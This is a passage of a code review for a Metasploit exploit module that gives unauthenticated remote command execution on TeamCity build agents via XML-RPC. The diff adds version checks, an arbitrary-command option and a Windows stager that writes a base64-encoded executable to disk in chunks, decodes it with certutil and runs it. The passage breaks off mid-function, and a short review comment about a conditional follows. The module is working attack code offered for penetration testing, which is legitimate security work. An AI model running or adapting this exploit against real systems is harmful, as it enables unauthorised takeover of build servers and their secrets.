modules/exploits/multi/misc/teamcity_agent_xmlrpc_exec.rb

```diff
@@ -0,0 +1,717 @@
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'TeamCity Agent XML-RPC Command Execution',
+      'Description'    => %q(
+        This module allows remote code execution on TeamCity Agents configured
+        to use bidirectional communication via xml-rpc. In bidirectional mode
+        the TeamCity server pushes build commands to the Build Agents over port
+        TCP/9090 without requiring authentication. Up until version 10 this was
+        the default configuration. This module supports TeamCity agents from
+        version 6.0 onwards.
+      ),
+      'Author'         => ['Dylan Pindur <dylanpindur@gmail.com>'],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['URL', 'https://www.tenable.com/plugins/nessus/94675']
+        ],
+      'Platform'       => %w[linux win],
+      'Targets'        =>
+        [
+          ['Windows', { 'Platform' => 'win' }],
+          ['Linux', { 'Platform' => 'linux' }]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Apr 14 2015'))
+
+    deregister_options('SRVHOST', 'SRVPORT', 'SSL', 'SSLCert', 'URIPATH', 'VHOST')
+    register_options(
+      [
+        Opt::RPORT(9090),
+        OptString.new(
+          'CMD',
+          [false, 'Execute this command instead of using command stager', '']
+        )
+      ]
+    )
+  end
+
+  def check
+    version = determine_version
+    if !version.nil? && version >= 15772
+      Exploit::CheckCode::Appears
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    version = determine_version
+    if version.nil?
+      fail_with(Failure::NoTarget, 'Could not determine TeamCity Agent version')
+    else
+      print_status("Found TeamCity Agent running build version #{version}")
+    end
+
+    unless datastore['CMD'].blank?
+      print_status('Executing user supplied command')
+      execute_command(datastore['CMD'], version)
+      return
+    end
+
+    case target['Platform']
+    when 'linux'
+      linux_stager(version)
+    when 'win'
+      windows_stager(version)
+    else
+      fail_with(Failure::NoTarget, 'Unsupported target platform!')
+    end
+  end
+
+  def windows_stager(version)
+    print_status('Constructing Windows payload')
+
+    exe_payload = generate_payload_exe
+    exe_name = Rex::Text.rand_text_alpha(8)
+    b64_exe_payload = Rex::Text.encode_base64(exe_payload)
+
+    # Split payload into chunks so we can echo it into a file
+    split_payload = b64_exe_payload.scan(/.{1,2000}/m)
+    commands = split_payload.map { |x| "echo|set /p=\"#{x}\" >> #{exe_name}.b64" }
+    echo_file = commands.join("\n")
+
+    script_content = %(
+      #{echo_file}
+      certutil -decode #{exe_name}.b64 #{exe_name}.exe
+      start "" %cd%\\#{exe_name}.exe
+    )
+    xml_payload = build_request(script_content.strip!, version)
+
+    if !xml_payload.nil?
```

Comment:
This conditional would be cleaner written as:

```ruby
    if xml_payload.nil?
      fail_with(Failure::NoTarget, "No compatible build config for TeamCity build #{version}")
    end

    print_status("Found compatible build config for TeamCity build #{version}")
    send_request(xml_payload)
```

Reply:
Good call, fixed.